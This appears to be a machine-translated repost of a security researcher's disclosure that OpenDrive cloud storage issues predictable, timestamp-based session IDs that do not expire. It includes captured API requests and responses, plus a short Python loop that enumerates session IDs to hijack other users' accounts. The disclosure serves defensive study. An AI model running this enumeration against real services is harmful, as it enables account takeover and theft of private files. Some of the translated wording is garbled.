Shulou(Shulou.com)05/31 Report--

Found OpenDrive cloud storage platform session mechanism vulnerability example analysis, many novices are not very clear about this, in order to help you solve this problem, the following small series will be explained in detail for everyone, there are people who need to learn, I hope you can harvest.

When comparing cloud storage solutions recently, I was surprised to find that many companies still offer unlimited cloud data storage solutions, such as OpenDrive (not to be confused with the OpenDRIVE format specification), which offers unlimited storage solutions for individuals, businesses, and corporations.

In addition to traditional cloud storage capabilities, OpenDrive also provides storage backup and content management solutions for customers in the form of software clients and mobile apps. According to OpenDrive's official website, many well-known companies, including T-Mobile, Ancesty.com and REMAX, are its customer groups.

found

I signed up for an OpenDrive trial account via a web client to test it. After uploading some test files, I noticed that OpenDrive's website architecture is WordPress, and there are obvious signs of customization in many places, including style, login and API usage.

I also noticed through the HTTP proxy that throughout the storage process, the storage mechanism makes calls to two API servers, one that starts with www and authenticates with cookies, and the other that starts with web and authenticates with a separate session ID as follows:

GET https://web.opendrive.com/api/v1/download/file.json/ABC123***REMOVED***? session_id=1517592191112474005&inline=0&preview=1 HTTP/1.1Host: web.opendrive.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36Accept: image/webp,image/apng,image/*,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Note the value in session_id in the GET request above:

session_id=1517592191 112474005

This value is somewhat similar to the timestamp under Unix systems, and it is most likely a translation of the time point of the user's initial login request--not so good! In fact, the first 10 numbers are translated from the data/time information when my account was first logged in.

The remaining 9 digits in the session_id above may simply be other, more precisely generated values for the same login time, such as milliseconds generated from server-side functions such as PHP's microtime. I tried to verify this by making a series of login requests to compare the generated session_id values, which, as predicted, were consecutive time values.

Next, I decided to look at how this session mechanism works and how it affects the security of OpenDrive's products. Because web clients have limited ability to call this API, I installed an OpenDrive Android APP on my test phone.

After deploying the request agent on my test phone, I logged into my OpenDrive account and started browsing files, moving folders, and accessing other information in my account. After observation, I found that all API servers use the same and vulnerable session_id generation mechanism, such as the following request example:

GET https://ai2.opendrive.com/api/v1/users/info.json/1517592191112474005 HTTP/1.1session_id: 1517592191112474005Host: ai2.opendrive.comConnection: Keep-AliveAccept-Encoding: gzipUser-Agent: okhttp/3.7.0

The above request is sent and the corresponding JSON response is returned as follows:

{ "UserID": 1853669, "AccessUserID": 0, "UserName": "***REMOVED***", "UserFirstName": "***REMOVED***", "UserLastName": "***REMOVED***", "PrivateKey": "***REMOVED***", "Trial": "0", "UserSince": "1517591533", "BwResetLast": "1517591533", "AccType": "1", "MaxStorage": "5120", "StorageUsed": "361144", "BwMax": "1024", "BwUsed": "0", "FVersioning": "0", "FVersions": "10", "DailyStat": 0, "UserLang": "en", "MaxFileSize": "102400", "Level": "1", "UserPlan": "Basic Plan", "TimeZone": "America\/Los_Angeles", "MaxAccountUsers": "1", "IsAccountUser": 0, "CompanyName": "", "Email": "***REMOVED***", "Phone": "", "Avatar": null, "AvatarColor": "a38f84", "AdminMode": 1, "DueDate": "0000-00-00", "WebLink": "", "PublicProfiles": 0, "RootFolderPermission": 2, "CanChangePwd": 1, "IsPartner": 0, "Partner": "OpenDrive", "SupportUrl": "http:\/\/support.opendrive.com", "PartnerUsersDomain": ".opendrive.com", "Suspended": false, "Affiliation": "0", "UserUID": "5ac61707c2ee6"}

Again, the above information suggests that all aspects of the application should be governed by a highly predictable and sequential "session" value. The following is an example of a request to get the contents of a folder:

GET https://ai2.opendrive.com/api/v1/folder/list.json/1517592191112474005/NjlfMTA2NzgyNF93RjZaUw? last_request_time=0&offset=0 HTTP/1.1session_id: 1517592191112474005Host: ai2.opendrive.comConnection: Keep-AliveAccept-Encoding: gzipUser-Agent: okhttp/3.7.0

The response was as follows:

{ "DirUpdateTime": "1522940036", "Name": "Pictures", "ParentFolderID": "NjlfMF93RjZaUw", "DirectFolderLink": "https:\/\/od.lk\/fl\/NjlfMTA2NzgyNF8", "ResponseType": 1, "Folders": [], "Files": [{ "FileId": "NjlfNzU3MTg2OV9RRDgxUA", "Name": "1337.jpg", "GroupID": 0, "Extension": "jpg", "Size": "5289", "Views": "0", "Version": "", "Downloads": "1", "DateModified": "1522940033", "Access": "2", "Link": "https:\/\/od.lk\/f\/NjlfNzU3MTg2OV8", "DownloadLink": "https:\/\/od.lk\/d\/NjlfNzU3MTg2OV8\/1337.jpg", "StreamingLink": "https:\/\/od.lk\/s\/NjlfNzU3MTg2OV8\/1337.jpg", "TempStreamingLink": "https:\/\/ai2.opendrive.com\/api\/download\/file.json\/NjlfNzU3MTg2OV8? inline=1", "ThumbLink": "https:\/\/ai2.opendrive.com\/api\/file\/thumb.json\/NjlfNzU3MTg2OV9RRDgxUA? session_id=19ebbbef64d8a5404cc0b16603cea3de659c607a23ae639986d5e5c477f6b5e8", "Password": "", "EditOnline": 1 }, { "FileId": "NjlfNzU3MTg3MF9ZQ3NDYg", "Name": "test.jpg", "GroupID": 0, "Extension": "jpg", "Size": "51756", "Views": "0", "Version": "", "Downloads": "0", "DateModified": "1522940034", "Access": "2", "Link": "https:\/\/od.lk\/f\/NjlfNzU3MTg3MF8", "DownloadLink": "https:\/\/od.lk\/d\/NjlfNzU3MTg3MF8\/test.jpg", "StreamingLink": "https:\/\/od.lk\/s\/NjlfNzU3MTg3MF8\/test.jpg", "TempStreamingLink": "https:\/\/ai2.opendrive.com\/api\/download\/file.json\/NjlfNzU3MTg3MF8? inline=1", "ThumbLink": "https:\/\/ai2.opendrive.com\/api\/file\/thumb.json\/NjlfNzU3MTg3MF9ZQ3NDYg? session_id=19ebbbef64d8a5404cc0b16603cea3de659c607a23ae639986d5e5c477f6b5e8", "Password": "", "EditOnline": 1 }]}

Note, through analysis, I found that under this session mechanism, any user account under OpenDrive system will be hijacked, and their private files will be obtained or destroyed by the following simple script. This situation is difficult to consider as a vulnerability, nor will it be considered as a fundamental design flaw.

url = "https://ai2.opendrive.com/api/v1/users/info.json"session = 1517592191112474005while True: f_url = "{}/{}".format(url, session) r = requests.get(f_url) if r.status_code == 200: print(f_url) session -= 1 Exploit scenarios

The risks of this session mechanism are obvious, but there are mainly two attack scenarios: one is that an attacker with moderate resource support can easily detect other valid user sessions in the system; the other is that a targeted attack against a single user only needs to know the approximate login time of the user, which narrows the attacker's session discovery scope. Other risks:

Sessions don't expire, and the OpenDrive sessions I tested in February are still valid in March;

Each login generates a new session, which also means that multiple session entries exist for any given user;

The vulnerable session mechanism exists not only in Android apps/clients, but also in other clients of web pages and desktop systems, which means that practically all OpenDrive users will be affected.

It's unclear how many of these conversations still exist in previous OpenDrive mitigations, but it's certainly a security threat.

Did reading the above help you? If you still want to have further understanding of related knowledge or read more related articles, please pay attention to the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.